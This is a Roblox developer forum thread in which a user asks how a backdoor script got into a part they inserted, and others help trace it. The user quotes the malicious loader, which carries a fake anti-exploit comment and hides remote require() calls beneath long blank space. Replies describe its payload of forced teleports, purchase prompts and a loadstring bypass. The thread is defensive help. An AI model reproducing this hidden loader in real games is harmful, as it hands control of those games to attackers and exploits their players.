I insert a part and have plugins that are trusted and the part that appears has a virus script in it

Help and Feedback Scripting Support
,
#1

I don’t know what I should put this post category under because nothing really suites it.

Hello! I’m Koala_Helper.

I want to achieve is finding the answer of how this happened. I have plugins that I trust really well.

The issue I am experiencing is that I inserted a part into the workspace using the way you would always do it, and like two days later a script that I figured out what made the virus possible is a debounce script. That appeared in the part I inserted. I have plugins that I trust a lot. I’ve used them for a while and no problems have happened.
Pictures:

Screenshot (221)
Screenshot (221)1920×1080 217 KB

I haven’t tried any solutions so far because I just want to figure out how this happened.

This is the script that was inside that virus script.


--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters.

--Thanks.





























































































































































































































































































local mymodule2 = require(3667797501)
mymodule2.antiexploit()

wait(2) 

local mymodule = require(3664252382)
mymodule.antibackdoor()

Does anybody know what can cause this?

Again sorry if this is under the wrong category. None really suite this.

3 Likes
#2

Turns out your plugins aren’t trustworthy after all. Which ones do you use? You likely grabbed a botted copy with a backdoor.

1 Like
#3

I use: Official building tools plugin, Auto anchor (I’ve used it for 8 months and nothing has happened wrong), Roudify, and the Tower of hell plugin where you can create a section for that game. I’ve had no problems with these plugins before.

#4

Can you link the plugins so I can check their source.

#5

Sure thing! Hang on just a moment.

#6

Part Auto Anchor Plugin - Roblox ThreeDText 2 - Roblox and I can’t link the toh one because I got it from their server chat server.

#7

Just in case if you fail to remove the back door, you can have a simple script that checks if there is a script named ‘Debounce’ in the part and then delete it.

for _, v in pairs(workspace:GetChildren() do
      if v:IsA("Script") and v.Name == "Debounce" then
         v:Destroy()
    end
end
#8

Another name for a script that I find is a no name script or “fix” and thanks for that script! It will help a lot.

#9

My friend @TheeDeathCaster made a plugin that allows you to look into different plugins and see their code and what they are composed of, I am pretty sure if there is a script in the plugin with that exact same message then it is the plugin that creates those messages.

1 Like
#10

Can you give more detail here? That one may be the malicious plugin

#11

It’s from their communication server. I would say the name but it isn’t allowed on this because I think people can publicly view this.

#12

Thanks! I’ll try it out. :smile:

#13

What is this “communication server” and who is the “their” here?

What? That sounds fishy to me

#14

I can message you. If you want.

1 Like
#15

I think your best bet is probably to manually search the plugins for the malicious script…

Firstly temporarily disable each plugin you have and move your local plugins out of their folder, and reload studio. This should make it so no plugins run, and you can open a Baseplate map. (You’ll need to keep track of which plugins are which by the way, you can name them if you want) Then drop in each rbxm/rbxmx into studio as well as for your downloaded plugins folder. Note: Your downloaded plugins are in %LocalAppdata%\Roblox\<your userId>\<plugin id>

Once you’ve done that, use Ctrl+Shift+F to open a find window, and type something from one of the malicious scripts, for example --This an script of ROBLOX Studio. and hit search. It should show every script that has that phrase. Then all you should need to do is click on one off the scripts it found and see what plugin its a part of. If you see no results, look through the plugins you trust the least for any weird or obfuscated code.

If you still can’t find anything, you can PM me your plugins and I can look at them myself and see what I find if you’re alright doing that.

1 Like
#17

I found what this ultimately leads back to, it spans multiple modules and even another free model. The end module is named XD by ModelBoyJoeXD. I can’t really read the obfuscated scripts, but luckily some weren’t obfuscated. This module does (and is not limited to) is teleport players back into the game if they’re beginning a teleport, and prompt the purchase of an item when they join. As per the items being prompted for purchase, they are game passes that come from this game. I’m not too sure if this’s 100% on topic, but I thought it would be good to note what this backdoor does.

Just as others have recommended, look into your plugins - it could be that you have a bad one, and look into any free models you may have inserted. Thanx @greatneil80 for sharing my plugin lol

EDIT
I looked into the other scripts (man there’s a lot), and the results are, uh, scary to say the least. There’s multiple scripts that when a 6th player enters the game, they’re teleported to this game named Loading. This also contains a loadstring bypasser where an exploiter can execute code regardless if LoadStringEnabled is on or not.

backdoor_scripts
backdoor_scripts209×761 52.7 KB

I think you should look into your plugins ASAP.

1 Like
#18

Checked all the scripts for the plugins you use and they look clean

#19

Oh. Lemme check everything I added.

#20

That’s what I thought as well!

#21

Any plugin claiming to put scripts automatically in your game calming to be ROBLOX is a fake.

Any scripts that hide requires at the very bottom are viruses.

Make sure the plugins you get are the real one, and not fake made by impersonators.

1 Like